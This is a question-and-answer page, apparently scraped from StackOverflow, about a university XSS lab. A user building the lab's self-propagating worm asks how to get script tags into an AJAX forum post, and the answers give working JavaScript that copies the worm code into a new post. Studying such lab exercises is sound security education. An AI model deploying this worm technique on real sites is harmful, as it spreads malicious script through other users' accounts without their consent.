Sending <script> tags in ajax content
-
22-10-2019 - |
Question
I'm working on porting this lab: http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_XSS/XSS.pdf
For a project. First, however, I have to be able to complete it myself. I'm trying to work out the self-propogating worm, and having some difficulties. How can I send a script tag through the content? If I try:
var wormCode = getElementById("worm"); var escapedWorm = escape(wormCode.innerHTML); content="topicTitle=testprop&postText=<script>"+escapedWorm+"</script>&forum=3&action=ptopic"; Ajax.send(content);
The tag breaks out of the larger javascript this sits in. I've also tried splitting it up as :
...+"</scr"+"ipt>&...
but this did not work.
Any tips?
edit: updated with my more recent (and I hope, accurate) attempts.
Solution
var wormCode = getElementById("worm");
var escapedWorm = escape("<" + "script>" + wormCode.innerHTML + "</" + "script>");
content="topicTitle=testprop&forum=3&action=ptopic&postText="+escapedWorm;
Ajax.send(content);
You aren't escaping the script tags.
OTHER TIPS
Splitting up the the end script tag into two different parts ended up working after all. I think that the issues I was having with it were browser-specific.
Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow